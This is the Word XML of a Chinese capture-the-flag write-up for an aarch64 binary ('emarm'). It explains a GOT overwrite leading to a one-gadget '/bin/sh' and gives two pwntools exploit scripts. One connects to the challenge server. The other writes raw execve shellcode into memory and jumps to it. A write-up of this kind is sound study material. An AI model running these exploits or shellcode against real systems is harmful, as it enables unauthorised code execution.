          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00351BBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改got表</w:t>
      </w:r>
      <w:r w:rsidR="00983786">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项执行</w:t>
      </w:r>
      <w:r w:rsidR="00983786">
        <w:t>’/bin/sh’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AAA9A4" w14:textId="799D9860" w:rsidR="00351BBF" w:rsidRDefault="00983786">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983786">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用任意地址写改</w:t>
      </w:r>
      <w:r w:rsidRPr="00983786">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidRPr="00983786">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>表项</w:t>
      </w:r>
      <w:r w:rsidR="00E772C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B382349" w14:textId="2ABA0A88" w:rsidR="00BE47E1" w:rsidRDefault="00BE47E1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搜索给定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，存在可用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，选最后一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，约束条件较少。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0899EE4E" w14:textId="77777777" w:rsidR="00BE47E1" w:rsidRDefault="00BE47E1" w:rsidP="00BE47E1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95471DA" wp14:editId="07A05EDD">
            <wp:extent cx="5274310" cy="29190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DA0A" w14:textId="658A71F8" w:rsidR="00BE47E1" w:rsidRPr="002343E8" w:rsidRDefault="007A2D8D" w:rsidP="00BE47E1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选择</w:t>
      </w:r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/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，因为可以控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06552461" w14:textId="3DF2E0CD" w:rsidR="00351BBF" w:rsidRPr="00BE47E1" w:rsidRDefault="007A2D8D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9A6DE4F" wp14:editId="01AB3B45">
            <wp:extent cx="4191031" cy="1595449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31" cy="159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A950" w14:textId="2CB4A5C4" w:rsidR="00351BBF" w:rsidRDefault="00BF00B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exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DB843" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D02B284" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>context(arch='aarch64',log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B874A11" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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</w:p>
    <w:p w14:paraId="10315F65" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>#pr = process('qemu-aarch64','-L','./','-g','1234','./emarm')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51256AD9" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>#pr = process('qemu-aarch64','-L','./','./emarm')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380F9C6" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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</w:p>
    <w:p w14:paraId="25FAECD5" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>libc_base = 0x4000830000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265C814B" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>exec_addr = libc_base + 0x63e80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8F2E3" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># 40008AAE80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAC3BC" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># fread 0x412060 = 4,268,128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F63D1E5" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>while(1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33782CC9" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AF8C2" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        #pr = process(['qemu-aarch64','-L','./','-g','1234','emarm'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105E6DE" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        pr = remote('183.129.189.60',10004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76BBEC" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.recvuntil("passwd:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68142E70" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.sendline('1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946797E" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.send('4268128')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAFCBD0" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        log.warn('success!!!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262AB9C3" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50254774" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.send(p64(exec_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41331045" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F040CD1" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.send('0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CA164" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17784FA6" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D94505E" w14:textId="77777777" w:rsidR="00351BBF" w:rsidRPr="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    except EOFError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DFC97" w14:textId="3DDC27C6" w:rsidR="00351BBF" w:rsidRDefault="00351BBF" w:rsidP="00BE47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351BBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        pr.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB799F4" w14:textId="47931A02" w:rsidR="002343E8" w:rsidRPr="002343E8" w:rsidRDefault="002343E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA0A940" w14:textId="6B26FB44" w:rsidR="002343E8" w:rsidRPr="002343E8" w:rsidRDefault="0076478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拿到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD08597" w14:textId="52268FA7" w:rsidR="002343E8" w:rsidRPr="002343E8" w:rsidRDefault="00764788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C61ED82" wp14:editId="158F36E0">
            <wp:extent cx="5274310" cy="54756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3A70" w14:textId="3E9DBDBE" w:rsidR="002343E8" w:rsidRPr="002343E8" w:rsidRDefault="002343E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448500CF" w14:textId="3D7CD66C" w:rsidR="002343E8" w:rsidRPr="002343E8" w:rsidRDefault="002343E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793AC32D" w14:textId="1E5A729A" w:rsidR="002343E8" w:rsidRDefault="00BF6035" w:rsidP="00BF6035">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一种方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB4E7F" w14:textId="0C18A330" w:rsidR="00BF6035" w:rsidRPr="00BF6035" w:rsidRDefault="00BF6035" w:rsidP="00BF6035">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过多次写，将shellcode写到内存，然后跳转执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0950F3AD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from  pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0DEB6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context(arch='aarch64',log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C9BB3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43DE29F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# fread 0x412060 = 4268128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252B9C68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# 0x411f70 = 4267888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C0B2D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FE580D1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sh1 = "\xe1\x45\x8c\xd2\x21\xcd\xad\xf2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BD4B6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sh2 = "\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C393C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sh3 = "\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC9AF3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sh4 = "\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5531222F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sh5 = "\xa8\x1b\x80\xd2\xe1\x66\x02\xd4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F950F8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FA42982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while(1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D96441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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E7C730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#pr = process(['qemu-aarch64','-L','./','-g','1234','emarm'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD15169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 = process(['qemu-aarch64','-L','./','emarm'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CDBDE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#pr = remote('183.129.189.60',10004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFBD2B9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pr.recvuntil("passwd:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D005CF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pr.sendline('1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657BA0C0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pr.send('4268128')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2DBB0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log.warn('success!!!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42C507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pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628D926E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pr.send(p64(0x400be4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C376D96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pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2573F55A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pr.send('4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9839DC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pr.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F0A7A8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95C9FE2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pr.send(str(0x412080))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716EA8B8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pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4B925B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pr.send(sh1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A7C1C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pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B809DA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pr.send('4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645EB534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pr.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A70E5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</w:p>
    <w:p w14:paraId="48A9D556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pr.send(str(0x412088))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A1D68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pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF6FE78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pr.send(sh2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618CF358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pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760682F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pr.send('4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889BE85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75EE070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pr.send(str(0x412090))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD506A6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pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CDF9A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pr.send(sh3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCAF3DB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pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F9FB64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pr.send('4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782DF534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24CFD8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pr.send(str(0x412098))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D464000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pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B12121F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pr.send(sh4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4E0C18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pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032F6F2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pr.send('4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E387010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3000F6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pr.send(str(0x4120a0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1AD77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pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57888EBD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pr.send(sh5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8C0B4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pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12657D47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pr.send('4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A83D5FF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B5833D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pr.send(str(0x412060))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64786857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pr.recvuntil("you will success")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47BFBF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pr.send(p64(0x412080))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D94030A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pr.recvuntil("i leave for you bye")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22456BD4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pr.send('4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C466BA5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49C8BA9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pr.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A68964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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1A79C" w14:textId="77777777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except EOFError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276A5242" w14:textId="38B7BCD3" w:rsidR="00BF6035" w:rsidRDefault="00BF6035" w:rsidP="00BF603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pr.kill()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D765D27" w14:textId="70E09455" w:rsidR="00BF6035" w:rsidRDefault="00BF6035" w:rsidP="00BF6035"/>
    <w:p w14:paraId="72A761C2" w14:textId="77777777" w:rsidR="00BF6035" w:rsidRPr="00BF6035" w:rsidRDefault="00BF6035" w:rsidP="00BF6035"/>
    <w:p w14:paraId="69D35FA0" w14:textId="6D086C2B" w:rsidR="002343E8" w:rsidRPr="002343E8" w:rsidRDefault="002343E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772A8ECD" w14:textId="77777777" w:rsidR="002343E8" w:rsidRPr="002343E8" w:rsidRDefault="002343E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002343E8" w:rsidRPr="002343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065"/>
    <w:rsid w:val="00016010"/>
    <w:rsid w:val="00226D26"/>
    <w:rsid w:val="002343E8"/>
    <w:rsid w:val="00351BBF"/>
    <w:rsid w:val="00566FA3"/>
    <w:rsid w:val="00632E67"/>
    <w:rsid w:val="00644A48"/>
    <w:rsid w:val="00764788"/>
    <w:rsid w:val="007941C8"/>
    <w:rsid w:val="007A2D8D"/>
    <w:rsid w:val="00983786"/>
    <w:rsid w:val="0099117F"/>
    <w:rsid w:val="00A64C36"/>
    <w:rsid w:val="00B716BA"/>
    <w:rsid w:val="00BE47E1"/>
    <w:rsid w:val="00BF00B6"/>
    <w:rsid w:val="00BF6035"/>
    <w:rsid w:val="00C913EF"/>
    <w:rsid w:val="00D402F1"/>
    <w:rsid w:val="00D42146"/>
    <w:rsid w:val="00E772C8"/>
    <w:rsid w:val="00EE1886"/>
    <w:rsid w:val="00FA3065"/>
    <w:rsid w:val="00FD0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39855"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D90247BF-C5DF-4798-8D5C-E0B097BE3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D07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07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D07E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D07E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7</Pages>
  <Words>592</Words>
  <Characters>3375</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>28</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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blingbling</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>blingbling</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-30T11:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-03T13:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>